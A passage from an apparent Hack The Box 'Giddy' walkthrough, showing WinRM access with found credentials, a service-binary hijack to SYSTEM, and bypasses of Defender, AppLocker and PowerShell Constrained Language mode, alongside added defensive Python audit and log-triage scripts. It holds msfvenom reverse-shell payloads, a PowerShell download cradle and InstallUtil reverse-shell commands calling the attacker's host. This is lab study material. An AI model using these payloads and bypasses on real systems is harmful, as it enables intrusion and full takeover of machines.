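        # decode twice: a double-encoded payload is still caught, a plain one is unchanged
        decoded = unquote_plus(unquote_plus(row.get("cs-uri-query", "")))
        matched = [label for label, rx in SQLI_INDICATORS if rx.search(decoded)]
        if matched:
            hits.append({
                "time": f"{row['date']} {row['time']}",
                "client": row.get("c-ip", ""),
                "uri": row.get("cs-uri-stem", ""),
                "query": decoded,
                "indicators": ",".join(matched),
                "time_taken_ms": row.get("time-taken", ""),
            })
    return hits


if __name__ == "__main__":
    for hit in find_sqli(SAMPLE_IIS_LOG):
        print(f"{hit['time']} {hit['client']} {hit['uri']} [{hit['indicators']}] "
              f"took {hit['time_taken_ms']} ms: {hit['query']}")
```

Point it at the real `u_ex*.log` files under `C:\inetpub\logs\LogFiles` (the default IIS log location) and the xp_dirtree request stands out twice over: once for the stacked `exec` and once for the UNC path pointing at an outside host.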

Trying to get a shell with the creds on WinRM:

$ evil-winrm -i giddy.htb -u stacy -p xNnWo6272k7x
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Stacy\Documents> whoami /all

USER INFORMATION
----------------
User Name   SID
=========== =============================================
giddy\stacy S-1-5-21-537587684-3058778966-1023884943-1000

GROUP INFORMATION
-----------------
Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users        Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                   Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

I can also get a shell in the browser via the login page at /remote.

Privesc x DLL Hijacking (Service Exploit)

Listing Stacy’s Documents directory:

*Evil-WinRM* PS C:\Users\Stacy\Documents> dir

    Directory: C:\Users\Stacy\Documents
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/17/2018   9:36 AM              6 unifivideo

That looks like a hint towards a service.

Let’s check what services are running. These commands didn’t work:

net start
cmd /c 'sc query state=all'
Get-WmiObject Win32_Service

Let’s look specifically for a service named unifivideo under the services registry key:

  • Listing the service’s registry key:
    PS C:\> ls HKLM:\system\currentcontrolset\services | select-string 'unifivideo'
    HKEY_LOCAL_MACHINE\system\currentcontrolset\services\UniFiVideoService
    
  • Checking the properties of UniFiVideoService:
    
    PS C:\> ls HKLM:\system\currentcontrolset\services | where-object {$_.name -Like "*unifivideo*"}
    
      Hive: HKEY_LOCAL_MACHINE\system\currentcontrolset\services
    Name                           Property
    ----                           --------
    UniFiVideoService              Type            : 16
                                 Start           : 2
                                 ErrorControl    : 1
                                 ImagePath       : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
                                 DisplayName     : Ubiquiti UniFi Video
                                 DependOnService : {Tcpip, Afd}
                                 ObjectName      : LocalSystem
                                 Description     : Ubiquiti UniFi Video Service
    
  • Querying config for the service:
$ cmd /c 'sc qc UniFiVideoService'
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: UniFiVideoService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Ubiquiti UniFi Video
        DEPENDENCIES       : Tcpip
                           : Afd
        SERVICE_START_NAME : LocalSystem

It reports the service as stoppable and gives the binary path as C:\ProgramData\unifi-video\avService.exe.

Let’s search for exploits on Ubiquiti:

$ searchsploit ubiquiti unifi video privilege escalation
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation      | windows/local/43390.txt
------------------------------------------------------------- --------------------------------

Upon start and stop of the service, it tries to load and execute the file at C:\ProgramData\unifi-video\taskkill.exe. By copying an arbitrary taskkill.exe to C:\ProgramData\unifi-video\ as an unprivileged user, it is therefore possible to escalate privileges and execute arbitrary code as NT AUTHORITY/SYSTEM.

Checking permissions on C:\ProgramData\unifi-video:

*Evil-WinRM* PS C:\programdata> icacls unifi-video
unifi-video NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
            BUILTIN\Administrators:(I)(OI)(CI)(F)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            BUILTIN\Users:(I)(CI)(WD,AD,WEA,WA)

Successfully processed 1 files; Failed processing 0 files

BUILTIN\Users has WD (write data/add file) and AD (append data/add subdirectory) on the directory itself, so any unprivileged user can create files in it.
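
The sc qc and icacls checks above are exactly what a defender would script to find this class of misconfiguration before an attacker does. The following Python is an added example (not code from the original post, winPEAS, or the exploit) that parses collected icacls output and a service ImagePath offline and reports whether a low-privileged principal can plant files in the service's binary directory. The sample icacls text is constructed to mirror the output above, the ImagePath is the one shown in the registry dump, and the principal list, rights set, and function names are my own assumptions.

```python
"""Offline audit: is a service's binary directory writable by low-privileged users?

Added example, not the original post's code. Inputs mirror `icacls <dir>` output
and the service ImagePath from the registry, so it runs on evidence collected
from a host without touching it.
"""
import ntpath
import re
from dataclasses import dataclass

# Constructed sample: icacls output for the directory, modelled on this page.
SAMPLE_ICACLS = """unifi-video NT AUTHORITY\\SYSTEM:(I)(OI)(CI)(F)
            BUILTIN\\Administrators:(I)(OI)(CI)(F)
            CREATOR OWNER:(I)(OI)(CI)(IO)(F)
            BUILTIN\\Users:(I)(OI)(CI)(RX)
            BUILTIN\\Users:(I)(CI)(WD,AD,WEA,WA)

Successfully processed 1 files; Failed processing 0 files
"""
# ImagePath as shown in the registry dump on this page.
SAMPLE_IMAGE_PATH = "C:\\ProgramData\\unifi-video\\avService.exe //RS//UniFiVideoService"

# Principals that every local user effectively holds (assumed list).
LOW_PRIV_PRINCIPALS = {
    "BUILTIN\\Users",
    "Everyone",
    "NT AUTHORITY\\Authenticated Users",
    "NT AUTHORITY\\INTERACTIVE",
}
# Rights that allow creating or replacing files in a directory:
# F full, M modify, W write, WD write data/add file, AD append data/add subdirectory.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD"}

ACE_RE = re.compile(r"^(?P<principal>[^:]+?):(?P<groups>(?:\([^)]*\))+)$")


@dataclass
class Ace:
    principal: str
    flags: set   # inheritance flags: I, OI, CI, IO, NP
    rights: set  # simple (F, M, RX, ...) or specific (WD, AD, ...) rights
    deny: bool


def parse_icacls(text: str, object_name: str) -> list:
    """Parse icacls output for one object; object_name is the path as passed to icacls."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(object_name):        # first line carries the object name
            line = line[len(object_name):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
        deny = "DENY" in groups
        groups = [g for g in groups if g != "DENY"]
        aces.append(Ace(m.group("principal"), set(groups[:-1]), set(groups[-1].split(",")), deny))
    return aces


def writable_by_low_priv(aces: list) -> list:
    """ACEs that let a low-privileged principal plant files in the directory itself."""
    return [
        a for a in aces
        if not a.deny
        and "IO" not in a.flags          # inherit-only: applies to children, not the folder
        and a.principal in LOW_PRIV_PRINCIPALS
        and a.rights & WRITE_RIGHTS
    ]


def binary_from_image_path(image_path: str) -> str:
    """Extract the executable from a service ImagePath (quoted, or up to the first .exe)."""
    s = image_path.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)]
    m = re.match(r"(?i)(.+?\.exe)", s)
    return m.group(1) if m else s.split(" ", 1)[0]


def audit_service_dir(image_path: str, icacls_text: str, object_name: str) -> dict:
    """Combine the ImagePath with the directory ACL into a finding summary."""
    exe = binary_from_image_path(image_path)
    hits = writable_by_low_priv(parse_icacls(icacls_text, object_name))
    return {
        "binary": exe,
        "directory": ntpath.dirname(exe),
        "writable_by": sorted({a.principal for a in hits}),
        # the classic unquoted-service-path issue: spaces in a path that is not quoted
        "unquoted_with_space": (" " in exe) and not image_path.strip().startswith('"'),
    }


if __name__ == "__main__":
    print(audit_service_dir(SAMPLE_IMAGE_PATH, SAMPLE_ICACLS, "unifi-video"))
```

On the sample it reports C:\ProgramData\unifi-video as writable by BUILTIN\Users, which is the precondition the exploit text describes; the inherit-only CREATOR OWNER entry is correctly ignored because it never applies to the folder itself. The remediation is to drop the Users write ACE (or keep service binaries under a directory only administrators can write to).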

Generating a reverse-shell exe with msfvenom, named taskkill.exe, to upload:

$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=4444 -f exe -o taskkill.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: taskkill.exe

But the file doesn’t run because it’s blocked by Defender.

*Evil-WinRM* PS C:\programdata\unifi-video> .\taskkill.exe
Program 'taskkill.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted software
At line:1 char:1
+ .\taskkill.exe
+ ~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

Bypass-AV (Win-Defender)

  • Encoding payload with some iterations of shikata-ga-nai encoding with msfvenom didn’t work.
  • Using a framework like veil-evasion didn’t work for me.

Let’s make binaries manually:

A payload like this works:

#include <stdlib.h>

/* Harmless test payload: runs whoami through the command interpreter. */
int main(void)
{
    system("whoami");
    return 0;
}

Compile this using:

$ i686-w64-mingw32-gcc exploit.c -o exploit.exe

But the following one doesn’t work; it gives the error exploit.exe : New-Object : Cannot create type. Only core types are supported in this language mode. That is because Constrained Language mode is enabled. Bypassing CLM is discussed below; for now I’ll use another workaround.

#include <stdlib.h>

/* Download-cradle payload: fails under Constrained Language mode (see below). */
int main(void)
{
    system("powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.18/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.18 -Port 4444");
    return 0;
}

Since I can execute basic commands as SYSTEM, I could just create another user and make it an administrator, but that wasn’t working for some reason. Still, I can read root.txt (note: I can also get a shell with nc.exe):

#include <stdlib.h>

/* Copies root.txt to stacy's desktop; runs as SYSTEM when the service starts. */
int main(void)
{
    system("copy C:\\users\\administrator\\desktop\\root.txt C:\\users\\stacy\\desktop\\root.txt");
    return 0;
}

Copying the file to the expected location and restarting the service:

*Evil-WinRM* PS C:\Users\Stacy\desktop> copy \\10.10.14.5\share\exploit.exe C:\programdata\unifi-video\taskkill.exe
*Evil-WinRM* PS C:\Users\Stacy\desktop> stop-service UniFiVideoService
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to stop...
*Evil-WinRM* PS C:\Users\Stacy\desktop> start-service UniFiVideoService
Warning: Waiting for service 'Ubiquiti UniFi Video (UniFiVideoService)' to start...
*Evil-WinRM* PS C:\Users\Stacy\desktop> type root.txt
CF559C6C121F683BF3E56891E80641B1

To get a reverse shell, you can use this C reverse-shell code.

Google “reverse shell in c windows” to find the link.

I changed the IP and port specified in re.cpp, then compiled it using:

$ i686-w64-mingw32-g++ re.cpp -o taskkill.exe -lws2_32 -lwininet -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

Then:

PS C:\> copy \\10.10.14.5\share\taskkill.exe C:\programdata\unifi-video\taskkill.exe
PS C:\> stop-service UnifiVideoService -Force
PS C:\> start-service UnifiVideoService

And I get a shell on my listener as nt authority\system:

root@TheCaretaker:~/HTB/Giddy$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.104] 49751
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\ProgramData\unifi-video> whoami
nt authority\system

Group Policy bypass / AppLocker Bypass

If I pull the winPEAS binary to automate the enumeration of the possible DLL hijacking in UniFiVideoService, Giddy doesn’t let me execute it. That’s because a Group Policy (AppLocker) is blocking execution.

PS C:\> .\winpeas.exe
Program 'winpeas.exe' failed to run: This program is blocked by group policy.

AppLocker’s default rules allow everything under the Windows directory. But there is a well-known list of user-writable directories under C:\Windows where those default rules still allow executing binaries, and C:\windows\system32\spool\drivers\color is one of them:

PS C:\> C:\windows\system32\spool\drivers\color\winpeas.exe
             *((,.,/((((((((((((((((((((/,  */
      ,/*,..*((((((((((((((((((((((((((((((((((,
    ,*/((((((((((((((((((/,  .*//((//**, .*(((((((*
    ((((((((((((((((**********/########## .(* ,(((((((
    (((((((((((/********************/####### .(. (((((((
    ((((((..******************/@@@@@/***/###### ./(((((((
    ,,....********************@@@@@@@@@@(***,#### .//((((((
    , ,..********************/@@@@@%@@@@/********##((/ /((((
    ..((###########*********/%@@@@@@@@@/************,,..((((
    .(##################(/******/@@@@@/***************.. /((
    .(#########################(/**********************..*((
    .(##############################(/*****************.,(((
    .(###################################(/************..(((
    .(#######################################(*********..(((
    .(#######(,.***.,(###################(..***.*******..(((
    .(#######*(#####((##################((######/(*****..(((
    .(###################(/***********(##############(...(((
    .((#####################/*******(################.((((((
    .(((############################################(..((((
    ..(((##########################################(..(((((
    ....((########################################( .(((((
    ......((####################################( .((((((
    (((((((((#################################(../((((((
        (((((((((/##########################(/..((((((
              (((((((((/,.  ,*//////*,. ./(((((((((((((((.

winPEAS shows two interesting things to look into:

  • DLL Hijacking on Unifi-Video
    
      Ubiquiti UniFi Video(Ubiquiti Networks, Inc. - Ubiquiti UniFi Video)[C:\ProgramData\unifi-video\avService.exe //RS//UniFiVideoService] - Autoload - No quotes and Space detected
      Possible DLL Hijacking in binary folder: C:\ProgramData\unifi-video (Users [WriteData/CreateFiles])
      Ubiquiti UniFi Video Service
    
  • PS History file
    
    [+] PowerShell Settings
      PowerShell v2 Version: 
      PowerShell v5 Version: 5.1.14393.0
      PowerShell Core Version: 
      Transcription Settings: 
      Module Logging Settings: 
      Scriptblock Logging Settings: 
      PS history file: C:\Users\Stacy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
      PS history size: 207B
    

PSHistory

PowerShell command history (PSReadLine) is enabled by default starting with PowerShell v5 on Windows 10. It is usually stored at $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt; you can run (Get-PSReadLineOption).HistorySavePath to get the path.

PS C:\> cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

net stop unifivideoservice
$ExecutionContext.SessionState.LanguageMode
Stop-Service -Name Unifivideoservice -Force
Get-Service -Name Unifivideoservice****
whoami
Get-Service -ServiceName UniFiVideoService
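
That history file is also a useful forensic artifact: a low-privileged account stopping services and probing the language mode, as above, is exactly what an investigator wants to spot quickly. The following Python triage is an added example (not part of the original post or of winPEAS) that runs over a constructed ConsoleHost_history.txt, modelled on the entries above plus two extra constructed lines, and flags service-control commands, language-mode probes and download cradles. The regexes, category names and function names are my own assumptions.

```python
"""Triage a PSReadLine ConsoleHost_history.txt for signs of service tampering.

Added example, not the original post's code. It reads the history text offline,
so it works on a copy of %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
collected from a host.
"""
import re

# Constructed sample: the entries shown on this page plus two extra constructed
# lines (a download cradle using a documentation-range address and a benign dir).
SAMPLE_HISTORY = """net stop unifivideoservice
$ExecutionContext.SessionState.LanguageMode
Stop-Service -Name Unifivideoservice -Force
Get-Service -Name Unifivideoservice
whoami
Get-Service -ServiceName UniFiVideoService
iex (New-Object Net.WebClient).DownloadString('http://203.0.113.5/script.ps1')
dir C:\\ProgramData
"""

# Service control via cmdlets, net.exe or sc.exe; the named group captures the service.
TAMPER_PATTERNS = [
    re.compile(r"(?i)\b(?:stop|start|restart)-service\s+(?:-(?:name|servicename)\s+)?(?P<svc>[^\s-]\S*)"),
    re.compile(r"(?i)\bnet(?:\.exe)?\s+(?:stop|start)\s+(?P<svc>\S+)"),
    re.compile(r"(?i)\bsc(?:\.exe)?\s+(?:stop|start|config|create)\s+(?P<svc>\S+)"),
]
RECON_SVC_RE = re.compile(r"(?i)\bget-service\b(?:\s+-(?:name|servicename))?\s*(?P<svc>[^\s-]\S*)?")
LANGMODE_RE = re.compile(r"(?i)SessionState\.LanguageMode")
DOWNLOAD_RE = re.compile(r"(?i)\b(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr|Start-BitsTransfer)\b")
WHOAMI_RE = re.compile(r"(?i)^\s*whoami\b")


def classify(command: str):
    """Return (category, service_name_or_None), or None if the line is uninteresting."""
    c = command.strip()
    for pat in TAMPER_PATTERNS:
        m = pat.search(c)
        if m:
            return ("service_tamper", m.group("svc").strip("*'\""))
    m = RECON_SVC_RE.search(c)
    if m:
        svc = m.group("svc")
        return ("service_recon", svc.strip("*'\"") if svc else None)
    if LANGMODE_RE.search(c):
        return ("language_mode_probe", None)
    if DOWNLOAD_RE.search(c):
        return ("download_cradle", None)
    if WHOAMI_RE.search(c):
        return ("recon", None)
    return None


def triage_history(text: str) -> list:
    """Walk the history file and return one finding per interesting line."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        hit = classify(line)
        if hit:
            findings.append({"line": n, "category": hit[0], "service": hit[1], "command": line.strip()})
    return findings


def services_touched(findings: list) -> list:
    """Distinct service names (case-folded) to pivot on in the System event log."""
    return sorted({f["service"].lower() for f in findings if f["service"]})


if __name__ == "__main__":
    for f in triage_history(SAMPLE_HISTORY):
        print(f"{f['line']:>3} {f['category']:<20} {f['service'] or '-':<20} {f['command']}")
    print("services:", services_touched(SAMPLE_HISTORY and triage_history(SAMPLE_HISTORY)))
```

The service names it returns are the pivot into the System event log, where the Service Control Manager records each stop and start (event ID 7036), and a language-mode probe sitting right before the service manipulation is a good sign the account was testing what it was allowed to run.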

PS Bypass-CLM

PowerShell Constrained Language is a language mode of PowerShell designed to support day-to-day administrative tasks, yet restrict access to sensitive language elements that can be used to invoke arbitrary Windows APIs.

PowerShell v5 detects when AppLocker Allow mode is in effect and sets the PowerShell language to Constrained Mode, severely limiting the attack surface on the system.

If I run any PowerShell script, such as Invoke-PowerShellTcp to get a reverse shell or PowerUp.ps1 for enumeration, it gives:

PS C:\Users\Stacy> powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.5/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 4444
Cannot create type. Only core types are supported in this language mode.

To confirm Language mode is constrained:

PS C:\Users\Stacy> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage

CLM can be bypassed with this tool, PSBypassCLM, which even offers a reverse shell in FullLanguage mode.

I built the solution after changing the target .NET Framework to 4.5; the other targets weren’t working. I can see which .NET version is installed on Giddy by listing C:\Windows\Microsoft.NET\Framework:

PS C:\Windows\Microsoft.NET\Framework> dir

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        8/16/2021  12:38 PM                v4.0.30319

Running the built PsBypassCLM.exe through InstallUtil.exe, with the assembly placed in the AppLocker-allowed directory from above:
PS C:\> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.5 /rport=443 /U c:\windows\system32\spool\drivers\color\PsBypassCLM.exe

Microsoft (R) .NET Framework Installation utility Version 4.6.1586.0
Copyright (C) Microsoft Corporation.  All rights reserved.
The uninstall is beginning.
See the contents of the log file for the c:\windows\system32\spool\drivers\color\PsBypassCLM.exe assembly's progress.
The file is located at .
Uninstalling assembly 'c:\windows\system32\spool\drivers\color\PsBypassCLM.exe'.
Affected parameters are:
   assemblypath = c:\windows\system32\spool\drivers\color\PsBypassCLM.exe
   rport = 443
   revshell = true
   rhost = 10.10.14.5
   logtoconsole = true
   logfile =
Trying to connect back...

And I get a shell. Checking the language mode in that shell:

PS C:\Users\Stacy\Documents> whoami
giddy\stacy
PS C:\Users\Stacy\Documents> $ExecutionContext.SessionState.LanguageMode
FullLanguage

This post is licensed under CC BY 4.0 by the author.